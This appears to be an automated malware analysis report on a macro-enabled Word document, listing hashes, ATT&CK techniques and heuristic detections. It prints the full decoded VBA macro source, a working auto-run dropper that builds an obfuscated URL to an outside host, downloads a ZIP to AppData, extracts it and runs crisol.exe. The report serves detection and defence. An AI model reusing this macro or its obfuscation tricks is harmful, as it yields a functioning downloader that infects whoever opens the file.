Office (OOXML) malware analysis — malicious · 5469b2f0ccd2f8f3

MALICIOUS

Office (OOXML)

18.7 KB Created: 2020-03-19 20:04:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-07-10

MD5: 7b8930b5bc8cf544520f78c3c3588bce SHA-1: 63f23b9bf7b544f956fc568763e5ea27f10be7a4 SHA-256: 5469b2f0ccd2f8f3113d7d5db9a821fecca31d76890a94526f0bfbcf50699bab

306 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1071.001 Web Protocols T1204.002 Malicious File

The sample contains VBA macros with AutoOpen and Workbook_Open subroutines, indicating an attempt to automatically execute malicious code upon opening. The script uses obfuscated string concatenation to construct the URL "the embedded link" and downloads a ZIP file to the user's AppData directory. It then attempts to extract and execute a file named 'crisol.exe' from the archive, likely to establish persistence and download further payloads.

Heuristics 10

VBA project inside OOXML medium 8 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    Call Shell("""" & strProgramName & """ """ & strArgument & """", vbNormalFocus)
```
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
    .write xHttp.responseBody
```
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Matched line in script
```
  Dim xHttp: Set xHttp = CreateObject("Mi" & "croso" & "ft.XML" & "HTTP")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
  Dim xHttp: Set xHttp = CreateObject("Mi" & "croso" & "ft.XML" & "HTTP")
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
    Set objList = GetObject("winmgmts:") _
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
    .savetofile Environ("Ap" & "pD" & "ata") & "\c" & "ris" & "ol.z" & "ip", 2 '//overwrite
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2258 bytes
SHA-256: `1c5ef5eab978b5b0ab899acd842a1c5f4eefec1496d740787d308569689ecd52`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub dlf() Dim xHttp: Set xHttp = CreateObject("Mi" & "croso" & "ft.XML" & "HTTP") Dim bStrm: Set bStrm = CreateObject("Ad" & "odb.Str" & "eam") xHttp.Open "GET", "ht" & "tps://cris" & "olfil" & "es.b" & "lob.c" & "ore." & "win" & "dows." & "net/cr" & "isolf" & "iles/" & "criso" & "l.zip", False xHttp.Send With bStrm .Type = 1 '//binary .Open .write xHttp.responseBody .savetofile Environ("Ap" & "pD" & "ata") & "\c" & "ris" & "ol.z" & "ip", 2 '//overwrite End With End Sub Sub aop() If Not ipr("crisol.exe") Then gdl Call UnZip(Environ("AppData"), Environ("Ap" & "pDa" & "ta") & "\c" & "ri" & "sol" & ".zi" & "p") Call sfwa End If End Sub Sub AutoOpen() aop End Sub Sub Workbook_Open() aop End Sub Sub gdl() dlf End Sub Sub UnZip(strTargetPath As String, Fname As Variant) Dim oApp As Object Dim FileNameFolder As Variant If Right(strTargetPath, 1) <> Application.PathSeparator Then strTargetPath = strTargetPath & Application.PathSeparator End If FileNameFolder = strTargetPath Set oApp = CreateObject("She" & "ll.Ap" & "plica" & "tion") oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, &H10& End Sub Sub sfwa() Dim strProgramName As String Dim strArgument As String strProgramName = Environ("AppData") & "\cr" & "" & "iso" & "l.e" & "xe" strArgument = "/G" Call Shell("""" & strProgramName & """ """ & strArgument & """", vbNormalFocus) End Sub Function ipr(process As String) Dim objList As Object Set objList = GetObject("winmgmts:") _ .ExecQuery("sel" & "ect * fr" & "om win" & "32_pr" & "ocess wh" & "ere name='" & process & "'") If objList.Count > 0 Then ipr = True Else ipr = False End If End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	14848 bytes
SHA-256: `b9e8d6195597fc47fa1b002a5f5726e4cc4590fe590f51b3dd69c01ac195ef78`

Open this report in the interactive analyzer, or submit your own file for analysis.